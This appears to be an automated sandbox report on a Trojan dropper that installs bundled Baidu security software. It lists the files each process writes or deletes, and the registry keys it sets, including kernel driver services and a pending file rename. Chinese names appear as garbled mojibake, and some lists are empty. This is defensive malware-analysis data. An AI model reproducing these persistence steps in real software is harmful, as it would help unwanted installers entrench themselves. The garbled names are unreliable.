%Documents and Settings%\All Users\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«-ÃƒÂ¨Ã‚Â½Ã‚Â¯ÃƒÂ¤Ã‚Â»Ã‚Â¶ÃƒÂ§Ã‚Â®Ã‚Â¡ÃƒÂ§Ã‚ÂÃ¢â‚¬Â .lnk (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMLog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\InstallHelper.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_self_enc.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMNet.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\blacksign.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDConfig.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\InstallCfg.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsIU.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDDefense_x64.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\DriverManager.dll (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Download\bddownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\color_desc.clr (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsBugRpt.exe (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0001.sys (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Download\bdcomproxy.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDPerflog.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsUpdate.exe (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\placeholder_tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0002.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMUpdate.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_customer.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\cache_config.dat (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\wverify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu16.tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMFrameWork.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\ns19.tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMReport.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\skin_engine.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.xml (0 bytes)

The process %original file name%.exe:716 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

The Trojan deletes the following file(s):

The process BaiduSdTray.exe:2844 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings% (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\LOG (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd (4 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086 (288 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs (96 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\902.dat (4 bytes)
%WinDir%\repair (4 bytes)
%Documents and Settings%\All Users\APPLICATION DATA (4 bytes)
%Program Files%\WIRESHARK (192 bytes)
%WinDir%\WinSxS (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (632 bytes)
%WinDir%\SoftwareDistribution (4 bytes)
%WinDir%\$hf_mig$ (96 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\900.dat (12 bytes)
%WinDir%\WinSxS\Manifests (1444 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wireshark.txt (12074 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\LOG (4 bytes)
%WinDir%\Help (248 bytes)
%WinDir%\ime (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\LOG (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch (4 bytes)
%WinDir%\Prefetch\NETSH.EXE-085CFFDE.pf (24 bytes)
%Documents and Settings%\All Users (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (4 bytes)
%WinDir% (1060 bytes)
%Documents and Settings%\All Users\Documents\My Music (4 bytes)
C:\$Directory (1388 bytes)
%System% (552 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\BaiduSdCache.rptc (102 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319 (1440 bytes)
%WinDir%\Microsoft.NET\Framework\V2.0.50727 (1444 bytes)
%WinDir%\Fonts (4 bytes)
%System%\config\systemprofile (4 bytes)
%Program Files%\COMMON FILES (4 bytes)
C:\ (4 bytes)
%Documents and Settings%\All Users\Start Menu\Programs (4 bytes)
%System%\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} (4 bytes)
%Program Files% (8 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667 (12 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB (4 bytes)
%Documents and Settings%\%current user% (4 bytes)
%WinDir%\Prefetch\REGSVR32.EXE-25EEFE2F.pf (48 bytes)
%Documents and Settings%\%current user%\APPLICATION DATA (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips (4 bytes)
%WinDir%\pchealth\helpctr (4 bytes)
%System%\drivers (4 bytes)
%Documents and Settings%\All Users\Start Menu (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\000003.log (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\G1023_s_70904[1].exe (1040 bytes)
%Program Files%\Adobe\Reader 9.0 (4 bytes)
%WinDir%\Prefetch (192 bytes)
%System%\wbem\Logs\wbemcore.log (576 bytes)
C:\totalcmd (4 bytes)
%System%\CatRoot2 (96 bytes)
%System%\wbem\Repository\FS\INDEX.BTR (608 bytes)
%Program Files%\Common Files\VMware\Drivers (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\LOG (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\G1023_s_70904.exe (17531 bytes)
%WinDir%\MICROSOFT.NET (4 bytes)
%Program Files%\Adobe\Reader 9.0\Reader (192 bytes)
%WinDir%\Microsoft.NET\Framework (96 bytes)
%WinDir%\assembly (4 bytes)
%Documents and Settings%\Default User (56 bytes)
%System%\oobe (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\000003.log (4 bytes)
%Documents and Settings%\LocalService (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\BaiduSdCache.rptc (0 bytes)

The process setup.exe:1056 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-LEFTL.tmp\setup.tmp (3779 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-LEFTL.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-LEFTL.tmp\setup.tmp (0 bytes)

The process BindEx.exe:1568 makes changes in the file system.

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Desktop\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«.lnk (0 bytes)
%Documents and Settings%\All Users\Desktop\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢.lnk (0 bytes)

The process BindEx.exe:1040 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\G1023_s_70904[1].exe (5514955 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F1023_s_30803.exe (4443178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\test[1].txt (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dlinstlit.txt (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\F1023_s_30803[1].exe (4700638 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\G1023_s_70904.exe (4688535 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The process setup.tmp:1976 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\baidu\is-39O9G.tmp (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-CCSRF.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\baidu\unins000.dat (932 bytes)
%Program Files%\baidu\is-RG24O.tmp (25913 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\baidu\baidu.lnk (479 bytes)
%Program Files%\baidu\BindEx.ini (65 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-CCSRF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-CCSRF.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-CCSRF.tmp\_isetup (0 bytes)

The process BDALeakfixer.exe:3188 makes changes in the file system.

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BaiduAnCache.rptc (0 bytes)

The process BaiduAn.exe:3824 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Desktop\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«-ÃƒÂ¨Ã‚Â½Ã‚Â¯ÃƒÂ¤Ã‚Â»Ã‚Â¶ÃƒÂ§Ã‚Â®Ã‚Â¡ÃƒÂ§Ã‚ÂÃ¢â‚¬Â .lnk (866 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«-ÃƒÂ¨Ã‚Â½Ã‚Â¯ÃƒÂ¤Ã‚Â»Ã‚Â¶ÃƒÂ§Ã‚Â®Ã‚Â¡ÃƒÂ§Ã‚ÂÃ¢â‚¬Â .lnk (878 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\SWManager\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«-ÃƒÂ¨Ã‚Â½Ã‚Â¯ÃƒÂ¤Ã‚Â»Ã‚Â¶ÃƒÂ§Ã‚Â®Ã‚Â¡ÃƒÂ§Ã‚ÂÃ¢â‚¬Â .lnk (882 bytes)

The process BaiduAnSvc.exe:3664 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%System%\config\system (4180 bytes)
%System%\config\software (3256 bytes)
%System%\config\SOFTWARE.LOG (4483 bytes)
%System%\drivers\BDEnhanceBoost.sys (61 bytes)
%System%\config (400 bytes)
%System%\config\SYSTEM.LOG (9458 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\MANIFEST-000002 (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\CURRENT (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\MANIFEST-000001 (0 bytes)

The process BaiduSdSvc.exe:1500 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\MANIFEST-000002 (4 bytes)
%System%\config\SYSTEM.LOG (13860 bytes)
%System%\config\software (28594 bytes)
%System%\config\SOFTWARE.LOG (29161 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\IsolationDB.db-journal (532 bytes)
%System%\drivers\BDMWrench.sys (1882 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db-journal (532 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\BaiduSdCache.rptc (2412 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db (145 bytes)
%System%\config (976 bytes)
%System%\config\system (6592 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\MANIFEST-000002 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db (149 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\IsolationDB.db (149 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db-journal (512 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\MANIFEST-000001 (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\CURRENT (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\BaiduSdCache.rptc (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\IsolationDB.db-journal (0 bytes)
%System%\drivers\BDMWrench.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db-journal (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\CURRENT (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\MANIFEST-000001 (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db-journal (0 bytes)

Registry activity

The process F1023_s_30803.exe:780 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Baidu\BaiduSd]
"InstallDate" = "2014-11-6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢]
"UninstallString" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\uninst.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"Version" = "2.1.0.3086"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢]
"DisplayVersion" = "2.1.0.3086"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\iexplore\AllowedDomains\*]
"(Default)" = ""

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"vendor" = "Beijing baidu Netcom science and technology co.ltd"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Description" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢ÃƒÂ¥Ã…Â Ã…Â¸ÃƒÂ¨Ã†â€™Ã‚Â½ÃƒÂ§Ã‚Â»Ã¢â‚¬Å¾ÃƒÂ¤Ã‚Â»Ã‚Â¶"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢]
"Publisher" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã…â€œÃ‚Â¨ÃƒÂ§Ã‚ÂºÃ‚Â¿ÃƒÂ§Ã‚Â½Ã¢â‚¬ËœÃƒÂ§Ã‚Â»Ã…â€œÃƒÂ¦Ã…Â Ã¢â€šÂ¬ÃƒÂ¦Ã…â€œÃ‚Â¯ÃƒÂ¯Ã‚Â¼Ã‹â€ ÃƒÂ¥Ã…â€™Ã¢â‚¬â€ÃƒÂ¤Ã‚ÂºÃ‚Â¬ÃƒÂ¯Ã‚Â¼Ã¢â‚¬Â°ÃƒÂ¦Ã…â€œÃ¢â‚¬Â°ÃƒÂ©Ã¢â€žÂ¢Ã‚ÂÃƒÂ¥Ã¢â‚¬Â¦Ã‚Â¬ÃƒÂ¥Ã‚ÂÃ‚Â¸"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Tag" = "2"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Altitude" = "326912"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Tag" = "4"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\BDMSkin.dll,"

[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_hips" = "%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ErrorControl" = "0"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Group" = "FSFilter Anti-Virus"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Description" = "BDArKit"

[HKLM\SOFTWARE\Baidu\BaiduHips]
"Version" = "1.0.0.667"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Type" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin\MimeTypes\application/np-BaiduSDDetect]
"Description" = "BaidusdDetectNPPlugin"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances]
"DefaultInstance" = "bd0003 Instance"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"InstallDir" = "%Program Files%\Baidu\BaiduSd"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 A6 F1 79 C5 C6 86 18 7C 1E 55 46 42 4F 3A 82"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DisplayName" = "bd0001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0003]
"DependOnService" = "FltMgr"

[HKLM\System\CurrentControlSet\Services\BaiduHips]
"Tag" = "1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Common Files\Baidu\BDDownload\108]
"bddownloader.exe" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ©Ã‚Â«Ã‹Å“ÃƒÂ©Ã¢â€šÂ¬Ã…Â¸ÃƒÂ¤Ã‚Â¸Ã¢â‚¬Â¹ÃƒÂ¨Ã‚Â½Ã‚Â½ÃƒÂ¥Ã‚Â¼Ã¢â‚¬Â¢ÃƒÂ¦Ã¢â‚¬Å“Ã…Â½"

[HKLM\SOFTWARE\Baidu\BaiduHips]
"InstallPath" = "%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Group" = "bddriver"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\BaiduHips]
"Group" = "bdsvcorder"

[HKLM\System\CurrentControlSet\Services\bd0003]
"ImagePath" = "system32\DRIVERS\bd0003.sys"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ImagePath" = "system32\DRIVERS\BDArKit.sys"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bdsvcorder" = "04 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00"

[HKLM\System\CurrentControlSet\Services\bd0002]
"DisplayName" = "bd0002"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Type" = "2"

[HKLM\System\CurrentControlSet\Services\bd0002]
"ErrorControl" = "0"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"RtpFlag" = "273"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Group" = "bddriver"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢]
"DisplayIcon" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\app.ico"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Tag" = "3"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Path" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\explugin\npBaiduSDDetectPlug.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢]
"DisplayName" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢2.1"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"VirusTime" = "2013.11.28 0110"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"

[HKLM\SOFTWARE\Baidu\BaiduHips]
"InstallDir" = "%Program Files%\Common Files\Baidu\BaiduHips"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Description" = "bd0002"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Type" = "1"

[HKLM\System\CurrentControlSet\Services\bd0003]
"ErrorControl" = "1"

[HKLM\System\CurrentControlSet\Services\bd0002]
"ImagePath" = "system32\DRIVERS\bd0002.sys"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"INSTLANG" = "2052"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"ProductName" = "BaiduSd"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DisplayName" = "BDArKit"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Description" = "Baidusd detect NPAPI plugin"

[HKLM\System\CurrentControlSet\Control\ServiceGroupOrder]
